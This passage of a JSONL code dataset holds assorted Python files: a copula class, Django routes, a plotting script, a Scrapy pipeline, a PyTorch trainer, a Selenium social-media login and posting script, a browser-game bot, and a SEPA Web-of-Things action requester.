\"beta\", the\n empirical beta copula is computed. If \"checkerboard\", the empirical checkerboard copula is computed.\n\n ties\n The method used to assign ranks to tied elements. The options are 'average', 'min', 'max', 'dense'\n and 'ordinal'.\n 'average': The average of the ranks that would have been assigned to all the tied values is assigned\n to each value.\n 'min': The minimum of the ranks that would have been assigned to all the tied values is assigned to\n each value. (This is also referred to as \"competition\" ranking.)\n 'max': The maximum of the ranks that would have been assigned to all the tied values is assigned to\n each value.\n 'dense': Like 'min', but the rank of the next highest element is assigned the rank immediately after\n those assigned to the tied elements. 'ordinal': All values are given a distinct rank, corresponding\n to the order that the values occur in `a`.\n\n offset\n Used in scaling the result for the density and distribution functions. Defaults to 0.\n \"\"\"\n self.ties = ties\n self._offset = offset\n self._name = \"Empirical\"\n self.smoothing = smoothing\n\n assert dim is not None or data is not None, \"Either dimension or data must be specified\"\n self._dim = data.shape[1] if dim is None else int(dim)\n assert self.dim > 1, \"Dimension must be >= 2\"\n\n self.data = data\n self.init_validate()\n\n @array_io_mcd\n def cdf(self, u: Array, log=False) -> np.ndarray:\n if np.any(u > (1 + EPSILON)) or np.any(u < -EPSILON):\n raise ValueError(\"input array must be pseudo observations\")\n cdf = emp_dist_func(u, self.data, self._smoothing, self._offset)\n return np.log(cdf) if log else cdf\n\n @property\n def data(self):\n \"\"\"\n The empirical data source from which to compare against. Note that when setting the data, it will\n be automatically transformed to pseudo-observations by default based on the\n :meth:`~EmpiricalCopula.ties` property\n \"\"\"\n if self._data is None:\n self._data = self.pobs(self._source, self.ties)\n return self._data\n\n @data.setter\n def data(self, data: Union[pd.DataFrame, np.ndarray]):\n data = np.asarray(data)\n assert data.ndim == 2, \"data must be 2 dimensional\"\n assert self.dim == data.shape[1], \"data and copula dimensions do not match\"\n self._source = data\n self._data = None\n\n @property\n def params(self):\n \"\"\"\n By default, the Empirical copula has no \"parameters\" as everything is defined by the input data\n \"\"\"\n return None\n\n @array_io_mcd\n def pdf(self, u: Array, log=False):\n assert self.smoothing == \"beta\", \"Empirical Copula only has density (PDF) for 'beta' smoothing\"\n assert isinstance(self.data, np.ndarray), \"data is still undefined for EmpiricalCopula\"\n u = self.pobs(u, self.ties)\n\n data_rank = rank_data(self.data, 1, self.ties)\n n = len(self.data)\n\n if log:\n return np.array([\n log_sum(\n np.array([\n sum(beta.logpdf(row, a=row_rank, b=n + 1 - row_rank))\n for row_rank in data_rank\n ])\n ) for row in u]) - np.log(n + self._offset)\n else:\n return np.array([\n sum([\n np.prod(beta.pdf(row, a=row_rank, b=n + 1 - row_rank))\n for row_rank in data_rank\n ]) for row in u]) / (n + self._offset)\n\n def random(self, n: int, seed: int = None):\n assert isinstance(self.data, np.ndarray), \"data is still undefined for EmpiricalCopula\"\n assert n <= len(self.data), \"random samples desired must not exceed number of rows in data\"\n\n if seed is not None:\n np.random.seed(seed)\n\n return self.data[np.random.randint(0, len(self.data), n)]\n\n @property\n def smoothing(self):\n \"\"\"\n The smoothing parameter. \"none\" provides no smoothing. \"beta\" and \"checkerboard\" provide a smoothed\n version of the empirical copula. See equations (2.1) - (4.1) in Segers, Sibuya and Tsukahara\n\n References\n ----------\n `The Empirical Beta Copula `\n \"\"\"\n return self._smoothing\n\n @smoothing.setter\n def smoothing(self, smoothing: Optional[Smoothing]):\n if smoothing is None:\n smoothing: Smoothing = \"none\"\n\n assert smoothing in (\"none\", \"beta\", \"checkerboard\"), \"Smoothing must be 'none', 'beta' or 'checkerboard'\"\n self._smoothing = smoothing\n\n def summary(self):\n return Summary(self, {\n \"Dimensions\": self.dim,\n \"Ties method\": self.ties,\n \"Offset\": self._offset,\n \"Smoothing\": self._smoothing,\n })\n\n @property\n def ties(self):\n \"\"\"\n The method used to assign ranks to tied elements. The options are 'average', 'min', 'max', 'dense'\n and 'ordinal'.\n\n 'average':\n The average of the ranks that would have been assigned to all the tied values is assigned\n to each value.\n 'min':\n The minimum of the ranks that would have been assigned to all the tied values is assigned to\n each value. (This is also referred to as \"competition\" ranking.)\n 'max':\n The maximum of the ranks that would have been assigned to all the tied values is assigned to\n each value.\n 'dense':\n Like 'min', but the rank of the next highest element is assigned the rank immediately after\n those assigned to the tied elements. 'ordinal': All values are given a distinct rank, corresponding\n to the order that the values occur in `a`.\n \"\"\"\n return self._ties\n\n @ties.setter\n def ties(self, value: Ties):\n if getattr(self, \"_ties\", \"\") != value:\n self._ties = value\n self._data = None\n","sub_path":"copulae/empirical/empirical.py","file_name":"empirical.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191995037","text":"from django.urls import include, path\n\nfrom .views import FollowAPIView, ListFollowView, UserView\n\nurlpatterns = [\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n path('users//subscribe/', FollowAPIView.as_view(),\n name='subscribe'),\n path('users/subscriptions/', ListFollowView.as_view(),\n name='subscriptions'),\n path('users/me/', UserView.as_view(), name='me'),\n path('', include('djoser.urls')),\n]\n","sub_path":"backend/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79464868","text":"#####################################################################\n# Python script to compute and plot the reflection coefficients.\n#\n# Run:\n# python3 RealRefIce.py ICEBERG1/\n#\n# The initial frequency space: omega\n# Interpolated onto a finer space omeganew with endpoints of omega\n# Compute the modal coefficients and plot\n# Compute the reflection and transmission coefficient and plot\n# Compute the energy conservation result.\n######################################################################\n\nimport numpy as np\nfrom modules.interpolateFreq import *\nimport matplotlib.pyplot as plt\nimport sys\nimport time\n\nfilePath=sys.argv[1];\n\npi=np.pi\nomega=2*pi*np.linspace(0.01,0.125,51)\nT=2*pi/omega\nRC=np.zeros((51,4),dtype=complex)\n\nnpts=399\nnev=10\nomeganew=interpolateCoeffsFreq(2*pi*0.01,2*pi*0.125,omega,nev,filePath+\"2_ModesMatrix/\",npts,1)\nLAM=buildLam(filePath)\n\nplt.figure(figsize=[10,4])\nplt.title(\"Modal Amplitudes\")\nfor m in np.arange(3,6):\n L=LAM[:,m]\n plt.plot(omeganew/(2*pi),abs(L),linewidth=2,label=\"$|\\lambda_\"+str(m+1)+\"|$\")\nplt.legend()\nplt.xlabel('$\\omega/(2\\pi)$')\nplt.ylim([0,5])\n\n## Interpolating reflection coefficients\nNModes = 3\nV=interpolateRefCoeff(omega,omeganew,nev,filePath+\"2_RefCoeff/\",NModes,\"C\")\nRC=buildRMat(LAM,filePath,\"C\",0)\nplt.figure(figsize=[10,4])\nplt.plot(omeganew/(2*pi),np.transpose(abs(RC)),linewidth=2,label=\"R($\\omega$)\")\n\n## Interpolating Transmission coefficients\nV=interpolateRefCoeff(omega,omeganew,nev,filePath+\"2_RefCoeff/\",NModes,\"T\")\nRT=buildRMat(LAM,filePath,\"T\",0)\nplt.plot(omeganew/(2*pi),np.transpose(abs(RT)),linewidth=2,label=\"T($\\omega$)\")\n\n# Check Energy Conservation\nplt.plot(omeganew/(2*pi),np.transpose(abs(RT)**2+abs(RC)**2),linewidth=2,label=\"$1.0$\")\n\nplt.title(\"$T(\\omega)$ and $R(\\omega)$\")\nplt.legend()\nplt.xlabel('$\\omega/(2\\pi)$')\nplt.ylim([0,1.1])\n\nplt.show()\n","sub_path":"python_modules/RealRefIce.py","file_name":"RealRefIce.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"495164590","text":"\"\"\"\nAUTHOR: zeng_xiao_yu\nGITHUB: https://github.com/zengxiaolou\nEMAIL: zengevent@gmail.com\nTIME: 2020/5/11-16:12\n\"\"\"\n\ndef func1():\n yield 1\n yield from func2()\n yield 2\n\ndef func2():\n yield 3\n yield 4\n\nf1 = func1()\nfor item in f1:\n print(item)","sub_path":"coroutines/yield_test.py","file_name":"yield_test.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"305863003","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport codecs\nclass AutoprojectPipeline(object):\n def __init__(self):\n self.file=codecs.open(\"goods.json\",'w',encoding='utf-8')\n def process_item(self,item,spider):\n for j in range(len(item['商品名称'])):\n name=item['商品名称'][j]\n price=item['商品价格'][j]\n link1=item['商品链接'][j]\n link2=item['店铺链接'][j]\n comments=item['商品评论数'][j]\n goods={\"商品名称\":name,\"商品价格\":price,'商品链接':link1,'店铺链接':link2,'商品评论数':comments}\n line=json.dumps(dict(goods),ensure_ascii=False)+'\\n'\n self.file.write(line)\n return item\n def spider_closed(self,spider):\n self.file.close()\n","sub_path":"pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"17835400","text":"import os\nimport time\nimport torch\nfrom metric import compute_drmsd_over_batch\n\n\nclass Trainer():\n def __init__(self, model, train_loader, val_loader, config):\n\n self.cfg = config['train']\n self.NUM_DIHEDRALS = config['model']['num_dihedrals']\n self.model = model\n self.dataloader = {'train': train_loader,\n 'val': val_loader}\n\n self._cuda()\n\n self._start_epoch = 0\n self._global_step = 0\n\n self.optimizer = torch.optim.Adam(self.model.parameters())\n\n def _cuda(self):\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model.to(self.device)\n\n def _net_mode(self, is_train):\n if is_train:\n self.model.train()\n else:\n self.model.eval()\n\n def loss_fn(self, x, y, m, s):\n if self.cfg['atoms'] == 'c_alpha':\n x = x[1::self.NUM_DIHEDRALS]\n y = y[1::self.NUM_DIHEDRALS]\n return compute_drmsd_over_batch(x, y, m, s)\n\n def train(self):\n for epoch in range(self._start_epoch, self.cfg['epochs']):\n self._net_mode(is_train=True)\n epoch_loss = 0\n start = time.time()\n for step, inputs in enumerate(self.dataloader['train']):\n # check empty data stream when all samples exceed max_len\n if inputs is None:\n continue\n\n prim, evol, tert, mask, slen = [x.to(self.device) for x in inputs]\n coord = self.model([prim, evol, slen])\n loss, loss_sum = self.loss_fn(coord, tert, mask, slen)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n epoch_loss += loss_sum.data\n\n self._global_step += 1\n\n avg_loss = epoch_loss / len(self.dataloader['train'].dataset)\n print(\"Epoch: {} | Avg drmsd: {:.3f} | Time: {:.2f}\".format(epoch + 1,\n avg_loss,\n time.time() - start))\n\n if (epoch + 1) % self.cfg['save_step'] == 0:\n self.save(epoch)\n\n if (epoch + 1) % self.cfg['eval_step'] == 0:\n self.evaluate()\n\n def evaluate(self, dl=None):\n if dl is None:\n dl = self.dataloader['val']\n\n self._net_mode(is_train=False)\n eval_loss = 0\n start = time.time()\n for step, inputs in enumerate(dl):\n if inputs is None:\n continue\n prim, evol, tert, mask, slen = [x.to(self.device) for x in inputs]\n coord = self.model([prim, evol, slen])\n loss, loss_sum = self.loss_fn(coord, tert, mask, slen)\n eval_loss += loss_sum.data\n\n avg_loss = eval_loss / len(dl.dataset)\n print(\"Evaluate loss: {:.3f} | Time: {:.2f}\".format(avg_loss, time.time() - start))\n\n\n def save(self, epoch):\n path = os.path.join(self.cfg['save_path'], \"epoch_{}\".format(epoch))\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict()\n }, path)\n\n def load(self, fname):\n ckpt = torch.load(fname)\n self.model.load_state_dict(ckpt['model_state_dict'])\n self.optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n self._start_epoch = ckpt['epoch']\n\n\n\nclass Logger():\n def __init__(self, log_dir):\n self.writer = torch.utils.tensorboard.SummaryWriter()\n\n def scalar_summary(self, tag, value, step):\n pass\n\n def image_summary(self,):\n pass\n\n def hist_summary(self,):\n pass\n\n\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"477034220","text":"import json\n\nfrom card_broker.models.player_state import PlayerState\nfrom card_broker.shared.db import get_new_db_session\nfrom card_broker.shared.card_operations.deck_helpers import shuffle_deck\n\nclass PlayerStateProxy():\n \"\"\"\n proxy object for manipulating and retrieving data from GameState objects\n \"\"\"\n\n def __init__(self, player_id):\n session = get_new_db_session()\n player_state = (\n session.query(PlayerState).filter(PlayerState.player_id == player_id).first()\n )\n\n self.id = player_state.id\n self.player_id = player_id\n self.card_state = json.loads(player_state.card_state)['card_state']\n session.close()\n\n def get_card_state(self):\n \"\"\"\n returns current game state\n \"\"\"\n return self.card_state\n\n def acquire_card(self, card_id):\n \"\"\"\n acquire a card, put in player discard\n \"\"\"\n self.card_state['discard'].append(card_id)\n self.update_card_state()\n\n def draw_card(self):\n \"\"\"\n draw card from deck\n \"\"\"\n self.card_state['hand'].append(\n self.card_state['deck'].pop()\n )\n self.update_card_state()\n\n def discard_card(self, hand_slot):\n \"\"\"\n discard card from hand to discard\n \"\"\"\n self.card_state['discard'].insert(\n len(self.card_state['discard']),\n self.card_state['hand'].pop(hand_slot)\n )\n self.update_card_state()\n\n def trash_card(self, hand_slot):\n \"\"\"\n removes card at hand slot from player card context, returns card_id so it can be\n sent to game trash\n \"\"\"\n card_id = self.card_state['hand'].pop(hand_slot)\n self.update_card_state()\n return card_id\n\n def discard_hand(self):\n \"\"\"\n discard entire hand into discard\n \"\"\"\n self.card_state['discard'].extend(self.card_state['hand'])\n self.card_state['hand'] = []\n self.update_card_state()\n\n def update_card_state(self):\n session = get_new_db_session()\n session.query(PlayerState).filter(PlayerState.id == self.id).update(\n {'card_state': json.dumps({'card_state':self.card_state})}\n )\n session.commit()\n session.close()\n","sub_path":"card_broker/models/player_state_proxy.py","file_name":"player_state_proxy.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596276741","text":"# date time format used everywhere, TZ is important so users know that it's localized\nDATETIME_FORMAT = '%Y-%m-%d %H:%M %Z'\n\n# final card state in a sprint\nCOMPLETED_COLUMNS = [\"Complete\", \"Accepted\"]\n\n# columns for sprint cards which indicate active sprint\nSPRINT_CARDS_ACTIVE = [\"In Progress\", \"Next\"]\n\n# columns used to compute sprint commitment\nSPRINT_COMMITMENT_COLUMNS = [\"Next\", \"In Progress\"]\n\n# initial columns we usually care about\nINITIAL_COLUMNS = [\"New\", \"Backlog\", \"Next\", \"In Progress\", \"Complete\"]\n\n# initial is good enough\nCUMULATIVE_FLOW_INITIAL_WORKFLOW = INITIAL_COLUMNS\n\n\n# help messages in UI\n\nBURNDOWN_CHART_DESCRIPTION = \"This chart is...\"\nCONTROL_CHART_DESCRIPTION = \"This chart is...\"\nVELOCITY_CHART_DESCRIPTION = \"This chart is...\"\nCUMULATIVE_FLOW_CHART_DESCRIPTION = \"This chart is...\"\nSPRINT_COMMITMENT_DESCRIPTION = \"Columns which...\"\nDATA_SYNCHRONIZATION_DESCRIPTION = \"Data are synchronized...\"\nSPRINT_CALCULATION_DESCRIPTION = \"Sprints are calculated...\"\nSELECTED_COLUMNS_DESCRIPTION = \"Filter...\"\n","sub_path":"trello_reporter/charting/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624161004","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\n# import selenium.webdriver.common.action_chains\n# from selenium import common\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nimport os\nimport urllib.request\nimport Conf_features\nimport hashtag_creator\n\n\n\nmobile_emulation = { \"deviceName\": \"iPhone 6\" }\n#img_link=''\nname_of_article=''\ntext_of_article=''\nhashtag_category=''\narticle_number=0\narticle_link=''\nsuccessful_post=False\nattempt=0\nusername=Conf_features.fb_mail\npsw=Conf_features.fb_password\n#probably_posted=False\n#counter_of_posts=0\n\n\n\ndef define_variables(name,text,hashtag,number,link):\n global name_of_article\n global text_of_article\n global hashtag_category\n global article_number\n global article_link\n name_of_article = name\n text_of_article = text\n hashtag_category = hashtag\n article_number = number\n article_link = link\n\n\n# def put_img_to_folder(image_link,number,name,high_text):\n# print(image_link)\n# urllib.request.urlretrieve(image_link,'autocon_images/'+'img_of_article'+str(number)+'.jpg')\n# Image_formalization.Image_change('autocon_images/'+'img_of_article'+str(number)+'.jpg',name,high_text)\n\n\n\ndef enter_to_instagram(driver):\n global probably_posted\n page_link = \"https://www.facebook.com/TESTpage-2226833254218260/?modal=admin_todo_tour\"\n enter_facebook_link=''\n\n #global counter_of_posts\n global successful_post\n #d=[]\n try:\n\n print(\"parse\"+article_link)\n # driver.get('http://'+article_link)\n # time.sleep(4)\n # WebDriverWait(driver, 15).until(EC.visibility_of_all_elements_located)\n # description = driver.find_element_by_xpath(\"//body / div / div[6] / div / div[1] / div[3] / div / p[1]\").text\n # print(description)\n # d=driver.find_element_by_xpath(\"//body / div / div[6] / div / div[1] / div[3] / div / p[2]\").text\n #\n # print(\"getted\")\n # #print(str(d))\n # print(len(d))\n # time_of_reading=len(d)//700+1\n # for m in re.finditer(\"\\n\",d):\n # if m.start()>=1000:\n # d=d[:m.start()]\n # print(len(d))\n # break\n # print(len(d))\n\n\n\n except Exception as msg:\n print(msg)\n\n driver.get(page_link)\n time.sleep(6)\n driver.find_element_by_xpath('//form/div/div/div/input[@aria-label=\"Email or Phone\"]').send_keys(username)\n\n driver.find_element_by_xpath('//form/div/div/div/input[@aria-label=\"Password\"]').send_keys(psw)\n driver.find_element_by_xpath('//*[@id=\"loginbutton\"]').click()\n time.sleep(60)\n # driver.implicitly_wait(10)\n #time.sleep(1)\n #WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH,\"//*[text()='Log in']\")))\n #try:\n # WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//main/article/div/div/div/button\")))\n # button_login = driver.find_element_by_xpath(\"//*[text()='Log in']\")\n # button_login.click()\n #WebDriverWait(driver, 10).until(EC.)\n\n #user_mail = driver.find_element_by_xpath(\"//*[@class='login-button__user']\")\n #assert user_mail.text == \"au\"\n # except selenium.common.exceptions.NoSuchElementException:\n # link_entry = driver.find_element_by_link_text(\"/accounts/login/?source=auth_switcher\")\n # link_entry.click()\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Phone number, username, or email']\")))\n login_field = driver.find_element_by_name(\"username\")\n login_field.send_keys(username)\n WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"//*[text()='Password']\")))\n password_field = driver.find_element_by_name(\"password\")\n password_field.send_keys(psw)\n # button_entry = driver.find_element_by_xpath(\"//*[text()='Войти']\")\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Log in']\")))\n time.sleep(1)\n entry_form = driver.find_element_by_xpath(\"//form[@method='post']\")\n entry_form.submit()\n #button_entry = driver.find_element_by_xpath(\"//*[text()='Log in']\")\n #button_entry.click()\n print(\"Log in\")\n #time.sleep(5)\n #driver.implicitly_wait(10)\n #WebDriverWait(driver,10).until(EC.visibility_of_all_elements_located)\n try:\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Not Now']\")))\n #driver.implicitly_wait(10)\n button_not_now = driver.find_element_by_xpath(\"//*[text()='Not Now']\")\n button_not_now.click()\n print(\"Not now\")\n except Exception as msg:\n print(msg)\n pass\n # driver.get(\"https://www.instagram.com/\" + username)\n # WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, \"//span[@aria-label='Profile']\")))\n driver.get(\"https://www.instagram.com/\"+username)\n #time.sleep(1)\n WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located)\n # amount_of_posts = int(driver.find_element_by_xpath(\"//ul/li/span/span\").text)\n # print(amount_of_posts)\n post=[]\n for j in range(9):\n xpath_str=\"// section / main / div / div[3] / article / div[1] / div / div[{0}] / div[{1}] / a / div / div[1] / img\".format(str((j)//3+1),str((j)%3+1))\n post.append(driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\"))#[:driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\").find(\"\\n\")])\n print(post[j])\n if post[j].find(description)!=-1: successful_post=True\n print(len(post))\n # post1=driver.find_element_by_xpath(\"// section / main / div / div[3] / article / div[1] / div / div[1] / div[1] / a / div / div[1] / img\")\n # post2=driver.find_element_by_xpath(\"//section/main/div/div[3]/article/div[1]/div/div[1]/div[2]/a/div/div[1]/img\")\n # post3 = driver.find_element_by_xpath(\"//section/main/div/div[3]/article/div[1]/div/div[1]/div[3]/a/div/div[1]/img\")\n # print(post1.get_attribute(\"alt\"))\n # print(post2.get_attribute(\"alt\"))\n # print(post3.get_attribute(\"alt\"))\n # print(name_of_article)\n # if (post1.get_attribute(\"alt\").find(name_of_article)!=-1)|(post2.get_attribute(\"alt\").find(name_of_article)!=-1)|(post3.get_attribute(\"alt\").find(name_of_article)!=-1):\n # successful_post=True\n\n # if (probably_posted==True)&(counter_of_posts'+str(new_amount_of_posts))\n\n for j in range(9):\n xpath_str = \"// section / main / div / div[3] / article / div[1] / div / div[{0}] / div[{1}] / a / div / div[1] / img\".format(\n str((j) // 3 + 1), str((j) % 3 + 1))\n post.append(driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\")) #[\n # :driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\").find(\"\\n\")])\n print(post[j+9])\n if post[j+9].find(description) != -1: successful_post = True\n\n if (post[9].find(description)==-1)|(len(post[9])==0):\n for l in range(8):\n if post[l+10]==post[l]: successful_post=True\n else:\n successful_post=False\n break\n\n\n\n# class LoginMailBox(unittest.TestCase):\n\n\ndef setUp():\n chrome_options = webdriver.ChromeOptions()\n # Add the mobile emulation to the chrome options variable\n #chrome_options.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n chrome_options.add_experimental_option(\"prefs\", {\"intl.accept_languages\": \"en-US\"})\n #chrome_options.add_argument('headless')\n # self.driver\\\n\n driv = webdriver.Chrome(executable_path='./chromedriver', chrome_options=chrome_options)\n return driv\n\n\n\n\ndef test_user_login_in_mail_box(dr):\n driver = dr\n global successful_post\n global attempt\n #WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located)\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time())))\n try:\n enter_to_instagram(driver)\n except Exception as msg:\n print(\"Error_of instagram\")\n print(msg)\n attempt+=1\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time())))\n #driver.close()\n driver.quit()\n\ndef tear_down(self):\n self.driver.quit()\n\ndef begin_of_driver(image_link, name, text, hashtag, number,high_text,link):\n print(\"begin of driver\")\n global successful_post\n global attempt\n #global probably_posted\n define_variables(name, text, hashtag, number,link)\n attempt=1\n while(successful_post!=True):\n test_user_login_in_mail_box(setUp())\n print(\"Attempt #\"+str(attempt))\n print(str(successful_post))\n if (attempt>=8): break\n if_post=successful_post\n successful_post=False\n return if_post","sub_path":"facebook_post.py","file_name":"facebook_post.py","file_ext":"py","file_size_in_byte":15046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424229216","text":"from PIL import ImageGrab, ImageOps # requires Pillow, numpy, PyAutoGUI and windows OS for ImageGrab and ImageOps\nfrom numpy import * # run the game at http://www.trex-game.skipser.com/ for reference in the same window \nimport pyautogui # ie have this window on the right end and the game on the left end\nimport time\n\n\nDinosaur = (171, 394)\nrestart_button = (340, 390)\n\n\ndef restart():\n pyautogui.click(restart_button)\n\n\ndef jump():\n pyautogui.keyDown('space')\n time.sleep(0.05)\n pyautogui.keyUp('space')\n\n\ndef grab():\n global dist\n box = (187, 394, 214, 415)\n image = ImageGrab.grab(box)\n grayscale = ImageOps.grayscale(image)\n dist = array(grayscale.getcolors())\n \n\n\ndef main():\n while True:\n grab()\n if dist.sum() != 814:\n jump()\n\n\nrestart()\nmain()","sub_path":"Challenge-1/3. game.py","file_name":"3. game.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449690326","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 14 22:13:56 2019\n\n@author: nebelgrau\n\"\"\"\n\n# Modulo\n\nnumbers = []\nfor _ in range(10):\n numbers.append(int(input())%42)\n\nprint(len(set(numbers)))","sub_path":"Modulo.py","file_name":"Modulo.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91550105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# request_action.py\n# \n# Copyright 2018 Francesco Antoniazzi \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n# DO NOT DELETE OR MOVE. THIS FILE IS USED BY wotMonitor.py\n\nimport sys\n\nfrom sepy.Sepa import Sepa as Engine\nfrom sepy import utils\n\nfrom cocktail.Action import *\nfrom cocktail.DataSchema import DataSchema\n\nfrom datetime import datetime\nfrom time import sleep\nimport argparse\n\ndef custom_handler(added,removed):\n print(\"\\n**************************************************************\")\n print(\"ADDED: {}\".format(added))\n print(\"REMOVED: {}\".format(removed))\n print(\"**************************************************************\\n\")\n\ndef main(args):\n sepa = Engine( ip = args[\"ip\"],\n http_port = args[\"query_port\"],\n ws_port = args[\"sub_port\"],\n security = {\"secure\": args[\"security\"], \n \"tokenURI\": args[\"token_uri\"], \n \"registerURI\": args[\"registration_uri\"]})\n \n # Building an inferred action...\n action = Action.buildFromQuery(sepa,utils.uriFormat(args[\"Action-URI\"]))\n if args[\"custom_handler\"] is None:\n if ((action.type is AType.IO_ACTION) or (action.type is AType.OUTPUT_ACTION)):\n # if the action is \"IO\" or \"OUTPUT\", we have to notify when an output is received.\n # Here's the handler!\n def handler(a,r):\n print(\"\\n**************************************\")\n print(\"Request action output handler! \")\n print(\"Added: {}\".format(a))\n print(\"Removed: {}\".format(r))\n print(\"**************************************\\n\")\n else:\n # Otherwise no handler is needed\n handler = None\n else:\n # This script allows to give as cmd-line argument a filepath to a file\n # containing a method called \"handler\" which will be used as handler\n import importlib.util as iutil\n spec = iutil.spec_from_file_location(\"module.name\",args[\"custom_handler\"])\n module = iutil.module_from_spec(spec)\n spec.loader.exec_module(module)\n handler = module.handler\n \n # receiving inputs from command line...\n bindings = {\"action\": action.uri,\n \"newAInstance\": utils.uriFormat(\"http://AInstance_\"+str(datetime.now()).replace(\" \",\"T\").replace(\":\",\"_\")+\"Z\"),\n \"newAuthor\": utils.uriFormat(\"http://MonitorPython\")}\n if ((action.type is AType.IO_ACTION) or (action.type is AType.INPUT_ACTION)):\n print(\"Please give input according to the following dataschema: \")\n print(\"DS info:\")\n dss = DataSchema.discover(sepa,ds=action.bindings[\"ids\"],nice_output=True)[\"results\"][\"bindings\"]\n \n if len(dss)>1:\n chosen_format = {}\n for ds in dss:\n queried_format[ds[\"ds\"][\"value\"]] = ds[\"fs\"][\"value\"]\n bindings[\"newIDS\"] = utils.uriFormat(input(\">> Please insert the DataSchema Uri chosen: \"))\n chosen_format = queried_format[chosen_ds]\n else:\n bindings[\"newIDS\"] = utils.uriFormat(dss[0][\"ds\"][\"value\"])\n chosen_format = dss[0][\"fs\"][\"value\"]\n bindings[\"newIValue\"] = input(\"({}) Insert input in {} format > \".format(bindings[\"newIDS\"],chosen_format))\n bindings[\"newIData\"] = utils.uriFormat(\"http://IDATA_\"+str(datetime.now()).replace(\" \",\"T\").replace(\":\",\"_\")+\"Z\")\n \n # actual action request \n action.newRequest( bindings,\n confirm_handler=lambda a,r: print(\"\\nConfirmation handler:\\na: {}\\nr: {}\".format(a,r)),\n completion_handler=lambda a,r: print(\"\\nCompletion handler:\\na: {}\\nr: {}\".format(a,r)),\n output_handler=handler)\n try:\n # Wait forever...\n print(\"CTRL-C to exit...\")\n while True:\n sleep(10)\n except KeyboardInterrupt:\n print(\"Bye Bye!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"WoT Action requestor\")\n parser.add_argument(\"-ip\", default=\"localhost\", help=\"Sepa ip\")\n parser.add_argument(\"-query_port\", default=8000, help=\"Sepa query/update port\")\n parser.add_argument(\"-sub_port\", default=9000, help=\"Sepa subscription port\")\n parser.add_argument(\"-token_uri\", default=None, help=\"Sepa token uri\")\n parser.add_argument(\"-registration_uri\", default=None, help=\"Sepa registration uri\")\n parser.add_argument(\"-custom_handler\", default=None, help=\"Action output handler location. The .py file must have a method inside called 'handler'\")\n parser.add_argument(\"Action-URI\",help=\"Uri of the action to be requested\")\n arguments = vars(parser.parse_args())\n if ((arguments[\"token_uri\"] is not None) and (arguments[\"registration_uri\"] is not None)):\n arguments[\"security\"] = True\n else:\n arguments[\"security\"] = 